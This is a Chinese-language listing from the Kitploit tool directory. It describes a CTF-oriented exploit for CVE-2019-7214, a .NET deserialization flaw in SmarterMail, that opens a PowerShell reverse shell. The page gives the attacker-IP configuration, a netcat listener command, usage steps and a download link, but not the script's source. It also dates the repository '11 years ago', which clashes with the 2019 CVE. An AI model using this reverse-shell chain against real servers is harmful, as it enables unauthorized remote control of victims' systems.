Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-7214 — For CTF use only (the CVE-2019-7214 also resolves the host from /etc/hosts) | Kitploit
工具/GitHubGitHub/elusivehacker/cve-2019-7214
Payload GenerationExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubelusivehacker/cve-2019-7214

CVE-2019-7214

For CTF use only (the CVE-2019-7214 also resolves the host from /etc/hosts)

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Windows 反向 Shell 漏洞利用(基于 TCP 的 PowerShell)

此 Python 脚本针对远程 Windows 计算机上运行的一个易受攻击的服务。它发送一个序列化的 .NET 负载,该负载在攻击者的计算机上启动基于 PowerShell 的反向 shell。

CVE-2019-7214

SmarterMail 系统中 .NET 反序列化的远程代码执行。


⚙️ 配置

更新脚本的配置部分以匹配您的环境:

root@kitploit:~
HOSTNAME = 'hostname'       # 目标主机名(通过 /etc/hosts 解析)
PORT = 9999                 # 目标监听序列化输入的端口
LHOST = '192.168.45.185'    # 攻击者 IP(监听器)
LPORT = 4444                # 攻击者监听端口

🧪 功能说明

  • 将目标主机名解析为 IP 地址。
  • 构造 PowerShell 反向 shell 命令。
  • 以 UTF-16LE 格式对命令进行 Base64 编码。
  • 将其附加到预构建的序列化 .NET 负载块。
  • 通过 TCP 连接将负载发送到目标。

🛠 环境要求

  • Python 3.x
  • Netcat 或类似工具在攻击者端口上监听:
    root@kitploit:~
    nc -lvnp 4444
    

🚀 使用方法

root@kitploit:~
python3 CVE-2019-7214 .py

如果成功,您将在监听器上收到来自目标的 PowerShell 提示符。


🧼 注意事项

  • 确保目标接受指定端口上的序列化 .NET 输入。
  • 此脚本假设目标能够执行包含 System.Management.Automation 功能的反序列化对象。
  • 注意间距、编码和负载大小 – PowerShell 命令被填充到恰好 1360 字节以避免损坏。

⚠️ 免责声明

此脚本仅供教育目的使用。未经授权对您不拥有或未经明确许可进行测试的系统使用是非法的且不道德的。

下载工具